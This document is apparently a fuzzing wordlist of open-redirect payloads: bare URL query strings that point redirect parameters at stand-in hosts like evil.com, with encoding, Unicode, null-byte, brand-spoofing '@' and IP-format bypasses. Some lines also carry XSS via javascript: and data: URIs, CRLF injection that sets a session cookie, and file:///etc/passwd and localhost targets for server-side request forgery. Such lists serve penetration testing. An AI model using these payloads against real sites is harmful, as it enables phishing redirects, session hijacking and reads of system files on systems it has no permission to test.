/?url=https://evil.com
/?next=//evil.com
/?redirect=//evil.com
/?url=//evil.com
/?goto=//evil.com
/?dest=//evil.com
/?r=//evil.com
/?out=//evil.com
/?view=//evil.com
/?path=//evil.com
/?to=//evil.com
/?url=%2F%2Fevil.com
/?redirect=%2F%2Fevil.com
/?next=%252F%252Fevil.com
/?path=%25252F%25252Fevil.com
/?r=%2F%2Fevil.com
/?dest=%5C%5Cevil.com
/?url=https://google.com@evil.com
/?redirect=https://paypal.com@attacker.com
/?goto=https://securebank.com@hacker.com
//evil.com
//attacker.com
//www.evil.com
/..//evil.com
/.../evil.com
/.../%2Fevil.com
/.../%252Fevil.com
/?url=javascript:alert(1)
/?redirect=data:text/html,<script>alert(1)</script>
/?goto=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
/?url=https://secure.com@evil.com
/?redirect=https://legit.com@attacker.com
/?goto=https://safe.com@badguy.com
/?url=evil.com%20
/?redirect=evil.com%0D%0A
/?goto=evil.com%09
/?next=evil.com%23
/?url=ftp://evil.com
/?redirect=file://evil.com
/?next=mailto:attacker@evil.com
/?goto=gopher://evil.com
/?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
/?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
/?url=127.0.0.1
/?redirect=localhost
/?goto=0x7f000001
/?url=%252F%252Fevil.com
/?redirect=%252F%252Fevil.com
/?next=%25252F%25252Fevil.com
/?url=evil.com%0D%0ASet-Cookie:session=attacker
/?redirect=evil.com%0D%0ASet-Cookie:session=hacked
/?url=%3B%2Fevil.com
/?redirect=%26%2Fevil.com
/?next=%3F%2Fevil.com
/?url=//ｅｖｉｌ.com
/?redirect=//ｅｖｉｌ.ｃｏｍ
/?goto=//\u0065\u0076\u0069\u006c.com
/?next=//\u002f\u002f\u0065\u0076\u0069\u006c.com
/?url=//%EF%BD%85%EF%BD%96%EF%BD%89%EF%BD%8C.com
/?url=evil.com%00
/?redirect=evil.com%00.png
/?next=evil.com%00.css
/?goto=evil.com%00.jpg
/?url=%25252F%25252Fevil.com
/?redirect=%2525252F%2525252Fevil.com
/?next=%25%30%30%32F%25%30%30%32Fevil.com
/?url=javascript://%0Aalert(document.domain)
/?redirect=data:text/html,<script>alert('xss')</script>
/?next=file:///etc/passwd
/?goto=gopher://evil.com/
/?url=/login.php//evil.com
/?redirect=/index.html//evil.com
/?next=/dashboard.php//evil.com
/?goto=/home.php//evil.com
/?url=https://8.8.8.8
/?redirect=https://0.0.0.0
/?next=https://2130706433 (Decimal IP of 127.0.0.1)
/?goto=https://017700000001 (Octal IP of 127.0.0.1)
/?url=https://[::1] (IPv6 localhost)
/?redirect=https://longsubdomain.malicious.com.evil.com
/?url=evil.com?param=https://safe.com
/?redirect=evil.com#https://safe.com
/?next=evil.com?redirect=https://safe.com
/?goto=evil.com?next=https://safe.com
/?url=https://evil.com/%2E%2E
/?redirect=https://evil.com/%2E%2E%2F
/?next=https://evil.com/%2E%2E%2F%2E%2E/
/?goto=https://evil.com/%C0%AE/
/?url=https://evil.com/%E3%80%82/
/?redirect=https://evil.com/%252e/
/?next=https://evil.com/%u002e/
/?goto=https://evil.com/%u3002/
/?url=evil.com/.%2e/
/?redirect=evil.com/.%2e%2e/
/?next=evil.com/.%2e%2e%2e/
/?goto=evil.com/.%2e%2e%2e%2e/
/?url=https://2130706433
/?redirect=https://3232235777
/?next=https://2852039166
/?goto=https://16843009
/?url=evil.com/./.
/?redirect=evil.com/..//..//
/?next=evil.com/;/;
/?goto=evil.com/%2F%2E/
/?url=evil.com/%2F%2F/
/?redirect=evil.com/%5C%5C/
/?next=evil.com/%5C/
/?goto=evil.com/%252F%252F/
